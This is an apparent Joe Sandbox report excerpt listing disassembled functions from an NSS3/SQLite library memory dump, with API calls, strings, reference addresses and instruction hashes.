Instruction Fuzzy Hash: 0061BE74B052059FDB15CF29C894BAA37B2BF85308F1449A8EC095BB52D730EC56CBB9

Function 6C66FCF0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124AC,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C66FD7A
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C66FD94
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000124BF,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C66FE3C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C66FE83

Part of subcall function 6C66FEC0: memcmp.VCRUNTIME140(?,?,?,?,00000000,?), ref: 6C66FEFA
Part of subcall function 6C66FEC0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,?), ref: 6C66FF3B

Strings

database corruption, xrefs: 6C66FD6E, 6C66FE30
%s at line %d of [%.10s], xrefs: 6C66FD73, 6C66FE35
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C66FD64, 6C66FE26

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log$memcmpmemcpy
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1169254434-598938438
Opcode ID: eda84183c5bb6d5255472792c14e051fcf386d921e5f6a0f06a6f5fbaa644389
Instruction ID: cb443a2735d510cabb0c8097e7fb8e43c06f21d2a2a535b6e832f592991667b7
Opcode Fuzzy Hash: eda84183c5bb6d5255472792c14e051fcf386d921e5f6a0f06a6f5fbaa644389
Instruction Fuzzy Hash: 6A51A571A002059FCB04CFAAC990BAEBBF1FF48308F144469D905ABB52E735EC41CB96

Function 6C7B2F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C7B2FFD
sqlite3_initialize.NSS3 ref: 6C7B3007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C7B3032
sqlite3_mprintf.NSS3(6C81AAF9,?), ref: 6C7B3073
sqlite3_free.NSS3(?), ref: 6C7B30B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C7B30C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C7B30BB

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: cc856342ac8a3ca77025a0ebe62b64796ecde6b999e021642e93e3659d852891
Instruction ID: bef2ab38869666c56f7a36c24d8f88dd789d935f56b599f31dabee3358f49ffb
Opcode Fuzzy Hash: cc856342ac8a3ca77025a0ebe62b64796ecde6b999e021642e93e3659d852891
Instruction Fuzzy Hash: C341C271600606AFDB00CF25D984A86B7E6FF44368F148638EC2997B40EB31F995CBD1

Function 6C735ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(q]sl), ref: 6C735F0A
TlsGetValue.KERNEL32 ref: 6C735F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6C735F2F
PR_Unlock.NSS3(890008E8), ref: 6C735F55
PR_SetError.NSS3(00000000,00000000), ref: 6C735F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C735F7D

Part of subcall function 6C735220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C735F82,8B4274C0), ref: 6C735248
Part of subcall function 6C735220: EnterCriticalSection.KERNEL32(0F6C800D,?,6C735F82,8B4274C0), ref: 6C73525C
Part of subcall function 6C735220: PR_SetError.NSS3(00000000,00000000), ref: 6C73528E
Part of subcall function 6C735220: PR_Unlock.NSS3(0F6C7FF1), ref: 6C735299
Part of subcall function 6C735220: free.MOZGLUE(00000000), ref: 6C7352A9

Strings

q]sl, xrefs: 6C735EDB, 6C735F09

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID: q]sl
API String ID: 3150690610-3602227776
Opcode ID: 3ae3950e8a2c144fbc74dde81399ee5bd3e57456137ab5fe9dd2efb189a8d96a
Instruction ID: 23308d7927fd656f5c7ea2f1b69f9c5a332b86d76852c1c87e76c8ddcd886d57
Opcode Fuzzy Hash: 3ae3950e8a2c144fbc74dde81399ee5bd3e57456137ab5fe9dd2efb189a8d96a
Instruction Fuzzy Hash: E921F6B1D002149BDB10AF64ED49AEEB7B4EF08318F545139E909A7741EB31A914CBD1

Function 6C6F8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C70124D,00000001), ref: 6C6F8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C70124D,00000001), ref: 6C6F8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C70124D,00000001), ref: 6C6F8D73
PR_Unlock.NSS3(?,?,?,?,?,6C70124D,00000001), ref: 6C6F8D8C

Part of subcall function 6C78DD70: TlsGetValue.KERNEL32 ref: 6C78DD8C
Part of subcall function 6C78DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C78DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C70124D,00000001), ref: 6C6F8DBA

Strings

KRAM, xrefs: 6C6F8CF9
KRAM, xrefs: 6C6F8D3E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 789d55ee8238b76f0fee582b3bfc3adf570904351182f463876f481e19603de1
Instruction ID: 1ae6968f28a3f36e9cac516194b7400085dd37396b2f3941a7f5d6ad3240a362
Opcode Fuzzy Hash: 789d55ee8238b76f0fee582b3bfc3adf570904351182f463876f481e19603de1
Instruction Fuzzy Hash: FE21A1B1A046018FCB00EF79C58859EB7F1FF5A308F1589BAD9A887711DB34D842CBA5

Function 6C71ACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6C71ACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C71AD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C71AD23

Part of subcall function 6C7FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C7FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C71AD39

Strings

C_MessageDecryptFinal, xrefs: 6C71ACE1
(CK_INVALID_HANDLE), xrefs: 6C71AD1C
hSession = 0x%x, xrefs: 6C71ACFE, 6C71AD0E

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 2bff9951cf488bda00061a66e061ffe004e7786daf5252644cff75b2d7beccfc
Instruction ID: 6556b7fd8923ca9d459f9d7ec3b580299c0672c137c2857b802160f46b715014
Opcode Fuzzy Hash: 2bff9951cf488bda00061a66e061ffe004e7786daf5252644cff75b2d7beccfc
Instruction Fuzzy Hash: 2121D3706091049BDB20EB649E8DB6A37B5AB4272EF088435E84997F11DB24A80DC6D2

Function 6C7F0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C7F0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C7F0EFA

Part of subcall function 6C6DAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C6DAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7F0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7F0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7F0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7F0F2B

Strings

Aborting, xrefs: 6C7F0EB3
Assertion failure: %s, at %s:%d, xrefs: 6C7F0ED9, 6C7F0EE5, 6C7F0F06, 6C7F0F0B

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: cb90ce4656241ea6d25e95c1fd4c9d8da8d2a7f3d5231aa48dc365d3ede848c8
Instruction ID: c894839846c0a65373565cddea9d6ab45ed3173cf88e357e3027fb8928137853
Opcode Fuzzy Hash: cb90ce4656241ea6d25e95c1fd4c9d8da8d2a7f3d5231aa48dc365d3ede848c8
Instruction Fuzzy Hash: 6C01ADB6A00124ABDF22AFA4DC8989B3F6CEF46268B004424FD1987702D635E951C6E2

Function 6C7D1C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=ml,?,?,6C6D4E1D), ref: 6C7D1C8A
sqlite3_free.NSS3(00000000), ref: 6C7D1CB6

Strings

non-deterministic use of %s() in %s, xrefs: 6C7D1C85
a generated column, xrefs: 6C7D1C6C
a CHECK constraint, xrefs: 6C7D1C76, 6C7D1C81
w=ml, xrefs: 6C7D1C44
an index, xrefs: 6C7D1C67

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=ml
API String ID: 1840970956-1006249719
Opcode ID: b5aaf83e03e4e867b7c0f43b533297fb148223b1f8ce843601776ab5df9c89ab
Instruction ID: b3be0d341f2fb97704f6ff1943633250cf2f394d68bbedc58bb51b79567ee85f
Opcode Fuzzy Hash: b5aaf83e03e4e867b7c0f43b533297fb148223b1f8ce843601776ab5df9c89ab
Instruction Fuzzy Hash: C10147B1A041415BD710BB68E402DB277E5EF8234CF15487DED498BF02EB22E85AC755

Function 6C7B4D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7B4DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7B4DE0

Strings

%s at line %d of [%.10s], xrefs: 6C7B4DDA
misuse, xrefs: 6C7B4DD5
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7B4DCB
API call with %s database connection pointer, xrefs: 6C7B4DBD
invalid, xrefs: 6C7B4DB8

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 50f0ec75f8d3388d9a1123503c5f14fb09fa47507d086589dee264de116007bc
Instruction ID: 92624e8185f1bef0c34ccf5d7ef20d5580c425d770a2cd83a4f7e3ec680e7e94
Opcode Fuzzy Hash: 50f0ec75f8d3388d9a1123503c5f14fb09fa47507d086589dee264de116007bc
Instruction Fuzzy Hash: 8BF0B422E185752BDB204515CF26F8737958F03319F460DB1EF08BBF52D2299850A2D5

Function 6C7B4DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C7B4E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C7B4E4D

Strings

%s at line %d of [%.10s], xrefs: 6C7B4E47
misuse, xrefs: 6C7B4E42
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C7B4E38
API call with %s database connection pointer, xrefs: 6C7B4E2A
invalid, xrefs: 6C7B4E25

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 2869c4c15d87707e8a2e98d519081746e3c98ede22366097776c8fc87ada8167
Instruction ID: 45f7c70c303dcc921927e7af9f6ffeaef73fbae61312cf80e380f2c687e53c48
Opcode Fuzzy Hash: 2869c4c15d87707e8a2e98d519081746e3c98ede22366097776c8fc87ada8167
Instruction Fuzzy Hash: 43F0E211E489292BE6304925DE14F8337DE4B03329F0949F1FA0877F92D229986072D6

Function 6C6E9FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C6EA086
EnterCriticalSection.KERNEL32(?), ref: 6C6EA09B
PR_Unlock.NSS3(?), ref: 6C6EA0B7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6EA0E9
TlsGetValue.KERNEL32 ref: 6C6EA11B
EnterCriticalSection.KERNEL32(?), ref: 6C6EA12F
PR_Unlock.NSS3(?), ref: 6C6EA148

Part of subcall function 6C701A40: PR_Now.NSS3(?,00000000,6C6E28AD,00000000,?,6C6FF09A,00000000,6C6E28AD,6C6E93B0,?,6C6E93B0,6C6E28AD,00000000,?,00000000), ref: 6C701A65

Part of subcall function 6C701940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C704126,?), ref: 6C701966

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6EA1A3

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
String ID:
API String ID: 3953697463-0
Opcode ID: 81be44530b44acf10d5e2ee0167f6249ecb7d9e6a34159242360d20fec213cdf
Instruction ID: 96d6e46c1da92585d24afc5cc67b847c65226e2cabd6aa646b81010d3a50f6d6
Opcode Fuzzy Hash: 81be44530b44acf10d5e2ee0167f6249ecb7d9e6a34159242360d20fec213cdf
Instruction Fuzzy Hash: 45512CB1A052009BEB109F65CC48AEB7BF9AF8A30CB15443EDC19D7702EB31D845C699

Function 6C720C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C721444,?,00000001,?,00000000,00000000,?,?,6C721444,?,?,00000000,?,?), ref: 6C720CB3

Part of subcall function 6C78C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C78C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C721444,?,00000001,?,00000000,00000000,?,?,6C721444,?), ref: 6C720DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C721444,?,00000001,?,00000000,00000000,?,?,6C721444,?), ref: 6C720DEC

Part of subcall function 6C740F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C6E2AF5,?,?,?,?,?,6C6E0A1B,00000000), ref: 6C740F1A
Part of subcall function 6C740F10: malloc.MOZGLUE(00000001), ref: 6C740F30
Part of subcall function 6C740F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C740F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C721444,?,00000001,?,00000000,00000000,?), ref: 6C720DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C721444,?,00000001,?,00000000), ref: 6C720E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C721444,?,00000001,?,00000000,00000000,?), ref: 6C720E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C721444,?,00000001,?,00000000,00000000,?,?,6C721444,?,?,00000000), ref: 6C720E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C721444,?,00000001,?,00000000,00000000,?), ref: 6C720E79

Part of subcall function 6C731560: TlsGetValue.KERNEL32(00000000,?,6C700844,?), ref: 6C73157A
Part of subcall function 6C731560: EnterCriticalSection.KERNEL32(?,?,?,6C700844,?), ref: 6C73158F
Part of subcall function 6C731560: PR_Unlock.NSS3(?,?,?,?,6C700844,?), ref: 6C7315B2

Part of subcall function 6C6FB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C701397,00000000,?,6C6FCF93,5B5F5EC0,00000000,?,6C701397,?), ref: 6C6FB1CB
Part of subcall function 6C6FB1A0: free.MOZGLUE(5B5F5EC0,?,6C6FCF93,5B5F5EC0,00000000,?,6C701397,?), ref: 6C6FB1D2

Part of subcall function 6C6F89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6F88AE,-00000008), ref: 6C6F8A04
Part of subcall function 6C6F89E0: EnterCriticalSection.KERNEL32(?), ref: 6C6F8A15
Part of subcall function 6C6F89E0: memset.VCRUNTIME140(6C6F88AE,00000000,00000132), ref: 6C6F8A27
Part of subcall function 6C6F89E0: PR_Unlock.NSS3(?), ref: 6C6F8A35

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: b89b21d0b4b26e45d6b225ee692a66fa9d9a7368810d4397a151d5fd7eeb1ac1
Instruction ID: 882f3c3f04d910d8abd5a9668902ce7c3ef6640c59d4f5a1ce2a768c5f67577e
Opcode Fuzzy Hash: b89b21d0b4b26e45d6b225ee692a66fa9d9a7368810d4397a151d5fd7eeb1ac1
Instruction Fuzzy Hash: 7D51D6F6E012005FEB00AF64DE99AAB37A8AF0521CF150474ED1997712F735ED1987B2

Function 6C6D6E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C6D6ED8
sqlite3_value_text.NSS3(?,?), ref: 6C6D6EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C6D6FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C6D6FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C6D6FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C6D7010
sqlite3_value_blob.NSS3(?,?), ref: 6C6D701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C6D7052

Memory Dump Source

Source File: 00000000.00000002.2032319543.000000006C661000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C660000, based on PE: true

Associated: 00000000.00000002.2032302336.000000006C660000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032465018.000000006C7FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032497178.000000006C83E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032522655.000000006C83F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032541748.000000006C840000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2032567747.000000006C845000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c660000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 2a87ed9fa28ce930d574e3a2d479c9d59573e527560451da42231c850fce4b25
Instruction ID: fc1ab3959e6256d19171883f243ad725d66f46199059f8977f606fce685d1028
Opcode Fuzzy Hash: 2a87ed9fa28ce930d574e3a2d479c9d59573e527560451da42231c850fce4b25
Instruction Fuzzy Hash: 9261F4B1E0460A8BDB00CFA5C8407EEB7B2AF85308F1A4564D415AB795E731FC06CB9A

